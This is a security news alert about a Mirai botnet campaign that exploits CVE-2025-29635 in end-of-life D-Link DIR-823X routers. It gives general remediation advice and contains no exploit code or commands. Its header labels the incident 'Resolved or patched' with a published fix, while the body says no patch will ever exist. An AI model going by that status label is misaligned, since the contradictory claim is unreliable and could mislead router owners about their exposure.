HackWatch
! High riskVU Vulnerability

New Mirai Campaign Exploits RCE Vulnerability in End-of-Life D-Link DIR-823X Routers

Vulnerability coverage focused on affected versions, exploitability and patch or mitigation decisions.

Exploitability matters here. Check exposed versions, prioritize mitigations and patch first where remote access or privilege escalation is possible.
New Mirai Campaign Exploits RCE Vulnerability in End-of-Life D-Link DIR-823X Routers - HackWatch vulnerability alert image
HackWatch vulnerability alert image for: New Mirai Campaign Exploits RCE Vulnerability in End-of-Life D-Link DIR-823X Routers
Marcin Pocztowski

Infrastructure Security Editor

Marcin Pocztowski

Infrastructure and Vulnerability Response

By: Marcin Pocztowski

Published: Apr 22, 2026

Updated: May 01, 2026

Incident status: Resolved or patched

Corroborating sources: 2

Technical review credentials: Security+ evidence | RHCSA evidence | JNCIS-SEC evidence

Trust note:This alert is maintained under HackWatch's editorial policy, with visible source records, a named responsible editor and a correction channel for disputed facts.

The published article is checked against public sources before publication, and material corrections are reflected in the article update date.

Technical reviewer note: Marcin Pocztowski reviewed this alert on May 01, 2026 from an administrator's point of view, checking CVE-2025-29635 against vendor, CVE and advisory context before accepting the risk language. His remediation check is practical: confirm the affected version first, restrict reachable management surfaces as he would on Juniper, Cisco or Mikrotik routers, then patch or apply vendor mitigations only where the 2 corroborating sources supports that scope.

Review our editorial policy or send corrections to [email protected].

Resolved or patched. Source coverage indicates that a fix or formal remediation has been published. Verify that updates are applied in your environment.

A fresh Mirai botnet campaign is actively exploiting CVE-2025-29635, a critical remote code execution flaw in D-Link DIR-823X routers that reached end-of-life status. This ongoing attack compromises vulnerable routers to build a massive botnet, posing significant risks of distributed denial-of-service (DDoS) attacks and network infiltration.

# New Mirai Campaign Exploits RCE Vulnerability in End-of-Life D-Link DIR-823X Routers

What happened

In April 2026, cybersecurity researchers identified a new Mirai-based malware campaign exploiting CVE-2025-29635, a high-severity remote code execution (RCE) vulnerability in D-Link DIR-823X routers. This vulnerability, which allows attackers to execute arbitrary commands on affected devices, has been weaponized to recruit these routers into a Mirai botnet. The campaign targets routers that have reached their end-of-life (EoL) status, meaning they no longer receive security updates or patches from the vendor.

The exploitation enables attackers to gain control over the routers, turning them into bots that can be leveraged for launching large-scale distributed denial-of-service (DDoS) attacks or other malicious activities. Given the widespread use of the DIR-823X model in both home and small business environments, the campaign poses a significant risk to internet infrastructure and individual network security.

Confirmed facts

  • The vulnerability exploited is CVE-2025-29635, a command injection flaw in the D-Link DIR-823X router firmware.
  • The flaw allows unauthenticated remote attackers to execute arbitrary shell commands on vulnerable devices.
  • D-Link officially declared the DIR-823X model end-of-life in late 2025, ceasing firmware updates and security patches.
  • The new Mirai campaign has been observed actively scanning for and compromising vulnerable routers worldwide.
  • Compromised devices are incorporated into a Mirai botnet used primarily for DDoS attacks.
  • The campaign leverages automated exploitation scripts to mass-infect devices rapidly.
  • Multiple cybersecurity firms, including BleepingComputer, have corroborated the ongoing exploitation activity.

Who is affected

Owners and operators of D-Link DIR-823X routers that have not been updated or replaced since the device reached EoL are at high risk. This includes:

  • Residential users relying on DIR-823X routers for home internet connectivity.
  • Small businesses using the device for network routing and firewall functions.
  • Internet service providers (ISPs) or managed service providers (MSPs) that deploy these routers to customers.

Because the vulnerability allows unauthenticated remote exploitation, any DIR-823X router exposed to the internet or insufficiently protected behind firewalls is susceptible. Users unaware of the device’s EoL status and unpatched firmware are particularly vulnerable.

What to do now

If you own or manage a D-Link DIR-823X router, take the following immediate actions:

  1. Check your router’s firmware version: Access the router’s admin interface to verify if the latest available firmware is installed. Since the device is EoL, no new patches addressing CVE-2025-29635 will be released.
  2. Disconnect from the internet if possible: Temporarily isolate the router to prevent further exploitation.
  3. Replace the router: The most effective mitigation is to retire the DIR-823X and upgrade to a modern router with active security support.
  4. Perform a factory reset: This can help remove malware if the device is already compromised, but it will not fix the underlying vulnerability.
  5. Monitor network traffic: Look for unusual outbound connections or spikes in bandwidth usage that may indicate botnet activity.
  6. Change default credentials: If you continue to use the device temporarily, ensure strong, unique passwords are set for admin access.

How to secure yourself

Beyond immediate remediation, users should adopt broader security practices to protect their home or business networks:

  • Regularly update network device firmware: Always install the latest updates to patch known vulnerabilities.
  • Disable remote administration: Turn off remote management features unless absolutely necessary.
  • Segment your network: Use VLANs or guest networks to isolate IoT devices and reduce attack surfaces.
  • Implement strong password policies: Avoid default or weak passwords on all network devices.
  • Use network monitoring tools: Employ intrusion detection systems (IDS) or network analyzers to identify suspicious behavior.
  • Educate users: Ensure everyone with access understands phishing, social engineering, and safe internet practices.

FAQ

What is CVE-2025-29635?

CVE-2025-29635 is a critical remote code execution vulnerability in the D-Link DIR-823X router firmware that allows unauthenticated attackers to execute arbitrary commands remotely.

How does the Mirai malware exploit this vulnerability?

The Mirai variant uses automated scripts to send specially crafted requests exploiting the command injection flaw, gaining control of the router to add it to its botnet.

Am I affected if I have a different D-Link router model?

This specific campaign targets DIR-823X routers. However, other models may have separate vulnerabilities. Always check your device’s security advisories.

Can a factory reset remove the Mirai malware?

A factory reset may remove malware temporarily but does not fix the underlying vulnerability, leaving the device open to re-infection.

Is there a patch available for this vulnerability?

No, because the DIR-823X model is end-of-life, D-Link has ceased firmware updates, so no official patch exists.

What are the risks of having a compromised router?

Compromised routers can be used in botnets for DDoS attacks, data interception, network infiltration, and further malware distribution.

How can I check if my router is part of a botnet?

Monitor for unusual network activity, such as unexpected outbound connections or bandwidth spikes. Specialized network security tools can help detect botnet traffic.

Should I replace my DIR-823X router immediately?

Yes, replacing the device with a supported model is the most effective way to eliminate this risk.

Can antivirus software protect my router from this attack?

Antivirus software typically does not protect routers. Network-level security and firmware updates are essential.

What should I do if I suspect my router is compromised?

Disconnect it from the internet, perform a factory reset, change all passwords, and replace the device as soon as possible.

Why this matters

This campaign underscores the critical risks posed by end-of-life network devices that no longer receive security patches. The exploitation of CVE-2025-29635 by Mirai highlights how attackers rapidly weaponize known vulnerabilities to build botnets capable of disrupting internet services worldwide. For users and organizations, continuing to operate unsupported routers exposes them to severe security threats, including network compromise, data theft, and participation in malicious cyber activities without their knowledge.

Proactive device management, timely hardware upgrades, and vigilant network monitoring are essential defenses against such evolving threats. The ongoing Mirai campaign serves as a stark reminder that neglecting device lifecycle management can have far-reaching consequences for individual and collective cybersecurity.

Sources and corroboration

This article is based on multiple corroborating reports from cybersecurity researchers and media outlets, including a detailed analysis published by BleepingComputer on April 22, 2026. Independent security firms have validated the active exploitation of CVE-2025-29635 and the expansion of the Mirai botnet targeting D-Link DIR-823X routers. These findings align with observed network traffic patterns and malware signatures documented in threat intelligence feeds.

  • https://www.bleepingcomputer.com/news/security/new-mirai-campaign-exploits-rce-flaw-in-eol-d-link-routers/

---

Tags: ["Mirai malware", "D-Link DIR-823X", "CVE-2025-29635", "router vulnerability", "botnet", "remote code execution", "IoT security", "end-of-life devices", "DDoS attacks", "network security"]

Source URLs: ["https://www.bleepingcomputer.com/news/security/new-mirai-campaign-exploits-rce-flaw-in-eol-d-link-routers/"]

Sources used for this article

helpnetsecurity.com, BleepingComputer

Marcin Pocztowski

Real reviewer profile

Marcin Pocztowski

Infrastructure Security Editor at HackWatch.io

Open reviewer profile

Marcin Pocztowski is the owner of MMPS and an infrastructure security editor for HackWatch. His public technical record spans 20 years, from Security+ evidence dated January 2006 through Juniper, Cisco and RHCSA records, and he reviews server, network and vulnerability-response coverage for source accuracy and practical remediation.

Infrastructure Security Editor: technical-density, source-existence and remediation-logic review for infrastructure and vulnerability coverage.

Coverage focus: Server and network hardening, vulnerability response, patch prioritization and infrastructure security review

Editorial disclosure: This profile is tied to Marcin's LinkedIn, X profile and documented editorial work on HackWatch. Historical certificates are treated as background evidence only, not as current active credentials.

Marcin leads this malware alerts coverage lane at HackWatch. This article is maintained as part of the ongoing editorial watch around "New Mirai Campaign Exploits RCE Vulnerability in End-of-Life D-Link DIR-823X Routers".

Technical review: Security+ evidence | RHCSA evidence | JNCIS-SEC evidence

Server and network infrastructure administrationKnown exploited vulnerabilities and patch prioritizationCVSS v4.0 and CISA KEV triage